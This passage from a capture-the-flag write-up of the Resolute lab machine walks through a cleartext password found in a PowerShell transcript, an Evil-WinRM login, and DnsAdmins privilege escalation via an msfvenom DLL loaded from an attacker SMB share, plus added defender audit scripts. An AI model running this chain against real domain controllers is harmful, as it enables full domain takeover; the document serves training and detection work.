In it we find a very interesting line, a net use command with the password typed on the command line (and mistyped badly enough that it failed, which is why the transcript repeats the error):
```
cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
```
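PowerShell transcription is a logging control, and what went wrong here is not that it was enabled but that the transcripts were written to a local directory any Remote Management Users member could read, and that a credential was passed on a command line that transcription faithfully records. The following PowerShell is an added audit script, not part of the original writeup; it reads the transcription policy, checks the output directory's ACL for low-privilege readers, and greps the transcripts for command shapes that usually carry a secret. The identity list, regex and fallback path (C:\PSTranscripts, the path seen on Resolute) are this example's assumptions.

```powershell
# Added defender-side audit, not part of the original writeup. Run as an
# administrator on the host whose transcription setup you want to check.
# Identity list, regex and fallback path are this example's assumptions.

$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'

function Get-TranscriptionConfig {
    $p = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Enabled          = [bool]$p.EnableTranscripting
        InvocationHeader = [bool]$p.EnableInvocationHeader
        OutputDirectory  = $p.OutputDirectory
    }
}

# Principals that should never be able to read transcripts on the host itself.
$lowPrivIdentities = 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
                     'BUILTIN\Remote Management Users'

function Test-TranscriptDirAcl {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -Path $Path)) { return }
    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        # ReadData (bit 0) is enough to read a transcript; generic read rights
        # from the ACL also carry it once cast to int.
        $canRead = (([int]$ace.FileSystemRights) -band 1) -ne 0
        if ($ace.AccessControlType -eq 'Allow' -and $canRead -and
            ($lowPrivIdentities -contains $ace.IdentityReference.Value)) {
            [pscustomobject]@{ Path = $Path; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

# Command shapes that commonly put a credential on the command line and so
# end up in the transcript in clear text (heuristic, constructed here).
$credPattern = '(?i)(net\s+use\s+\S+\s+\\\\\S+\s+\S+|/user:|-Password\s|ConvertTo-SecureString\s+-String)'

function Find-CredentialInTranscripts {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Recurse -Force -Filter 'PowerShell_transcript*.txt' -ErrorAction SilentlyContinue |
        Select-String -Pattern $credPattern |
        Select-Object Path, LineNumber, @{ n = 'Line'; e = { $_.Line.Trim() } }
}

# Usage
$cfg = Get-TranscriptionConfig
$cfg
$dir = if ($cfg.OutputDirectory) { $cfg.OutputDirectory } else { 'C:\PSTranscripts' }
Test-TranscriptDirAcl -Path $dir
Find-CredentialInTranscripts -Path $dir
```

On Resolute the ACL check would flag the directory (melanie, a Remote Management Users member, could list and read it) and the grep would return the net use line. The durable fix is to point OutputDirectory at a write-only network share collected by the SIEM and to rotate any credential that a transcript has ever captured; a transcript that logged a secret is itself now a secret.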
We have the user ryan's credentials, so we verify them by logging into the machine as that user:
```
$ ruby evil-winrm.rb -i 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123!"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
```
And now we have another user; we are closer to root, although we still have several steps to go.
Privilege escalation
Now that we have a user with more privileges, we review what we have gathered so far, specifically the LDAP dump we made at the beginning:
We note that the user ryan, who belongs to the Contractors group, is included in the DnsAdmins group, through which we could achieve the coveted privilege escalation on the machine.
After a Google search, we find a site explaining how the DnsAdmins group can be leveraged to escalate privileges.
One of the important steps is to verify that the system is a 64-bit version:
```
*Evil-WinRM* PS C:\Users\ryan\Documents> [Environment]::Is64BitOperatingSystem
True
```
Once verified, we create a payload that we will later upload to the machine; for this we use the msfvenom tool and generate a DLL that grants administrator rights to the user melanie:
```
$ msfvenom -p windows/x64/exec cmd='net group "domain admins" melanie /add /domain' --platform windows -f dll > /home/asdf/share/privesc.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 310 bytes
Final size of dll file: 5120 bytes
```
Now we create an SMB server on our machine, which the target will connect to in order to fetch the malicious DLL. We use impacket's smbserver for this:
```
$ sudo python smbserver.py -debug SHARE /home/asdf/share
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
Next we use the Windows dnscmd utility to point the registry key at our malicious DLL:
```
*Evil-WinRM* PS C:\> dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.217\SHARE\privesc.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
```
And we check the registry key to confirm that our DLL has been injected:
```
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : \\10.10.14.217\SHARE\privesc.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry
```
Now all that remains is to restart the DNS service; on startup it loads our DLL, which runs our command:
```
sc.exe stop dns
sc.exe start dns
```
And as we can see in the smbserver output, the DNS service (running as the machine account RESOLUTE$) came back to fetch the DLL, so the injection worked:
```
[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50329)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:292c9135c775699a60722ec130cc5f1f:0101000000000000006729e6ab28d60176263edb280de7f0000000000100100041006700590049004d00520044006b00020010004b006e0061004c0073007100670074000300100041006700590049004d00520044006b00040010004b006e0061004c00730071006700740007000800006729e6ab28d6010600040002000000080030003000000000000000000000000040000093eb6da6581ef356a2c0a8416ff8d541974fc440df68109fe7fcbf02abb82d200a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200310037000000000000000000
```
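The whole escalation rests on three conditions a defender can check directly: a non-administrator sitting in DnsAdmins (here via the nested Contractors group), the ServerLevelPluginDll value being settable by that group and honoured by the DNS service at start, and the resulting membership change to Domain Admins going unnoticed. The following PowerShell is an added audit and detection script, not part of the original writeup; it is meant to run on the DNS server / domain controller with administrator rights and the ActiveDirectory module, and it assumes Security Group Management auditing is enabled so that event 4728 is recorded. The group list and the 7-day window are this example's choices.

```powershell
# Added defender-side check, not part of the original writeup. Run on the DNS
# server / domain controller as an administrator with the ActiveDirectory module.
# Assumes "Audit Security Group Management" is enabled so 4728 events exist.
Import-Module ActiveDirectory

$dnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDll {
    # If ServerLevelPluginDll is populated, the DNS service loads that DLL as
    # SYSTEM on its next start. Legitimate use of this value is rare enough
    # that any non-empty value deserves a ticket.
    $v = (Get-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    [pscustomobject]@{
        Configured = [bool]$v
        Path       = $v
        IsUncPath  = [bool]($v -and $v.StartsWith('\\'))   # fetched over SMB at load time, as on Resolute
    }
}

function Get-DnsAdminsExposure {
    # Recursive expansion matters: ryan reached DnsAdmins through Contractors.
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object SamAccountName, objectClass, distinguishedName
}

function Remove-DnsPluginDll {
    # Remediation is clearing the registry value (deleting the DLL alone is not
    # enough) and then restarting the DNS service.
    Remove-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
}

function Get-RecentPrivilegedGroupAdds {
    param([int]$Days = 7)
    # 4728 = member added to a security-enabled global group; Domain Admins is one.
    $watched = 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'DnsAdmins'
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4728; StartTime = (Get-Date).AddDays(-$Days) } `
                 -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($i in $x.Event.EventData.Data) { $d[$i.Name] = $i.'#text' }
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Group  = $d['TargetUserName']    # the group that gained a member
                Member = $d['MemberName']
                By     = $d['SubjectUserName']   # who performed the add
            }
        } |
        Where-Object { $watched -contains $_.Group }
}

# Usage (Remove-DnsPluginDll is deliberately not called automatically)
Get-DnsPluginDll
Get-DnsAdminsExposure | Format-Table -AutoSize
Get-RecentPrivilegedGroupAdds | Format-Table -AutoSize
```

On this box the first function would report a UNC path on another host, the second would list ryan under DnsAdmins, and the third would show melanie being added to Domain Admins by RESOLUTE$ (the DNS service runs as the machine account, so the adder is the computer object, not a human, which is itself a strong signal). A DC authenticating outbound to an unknown SMB server, visible in the smbserver output above, is the network-side version of the same event.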
Getting the root flag
Now that it has run, all that remains is to log in as melanie and check the permissions:
```
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101


GROUP INFORMATION
-----------------

Group Name                                      Type             SID                                           Attributes
=============================================== ================ ============================================= ===============================================================
Everyone                                        Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                 Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                   Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access      Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                          Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                            Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                  Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGABANK\Domain Admins                          Group            S-1-5-21-1392959593-3013219662-3596683436-512 Mandatory group, Enabled by default, Enabled group
MEGABANK\Denied RODC Password Replication Group Alias            S-1-5-21-1392959593-3013219662-3596683436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level            Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```
And as we can see, we are now in the Administrators group, so let's go for our flag:
```
*Evil-WinRM* PS C:\Users\melanie\Documents> cd c:\users\administrator\desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/3/2019   7:32 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop>
```
And with that we have our root flag, completing the machine and earning our points.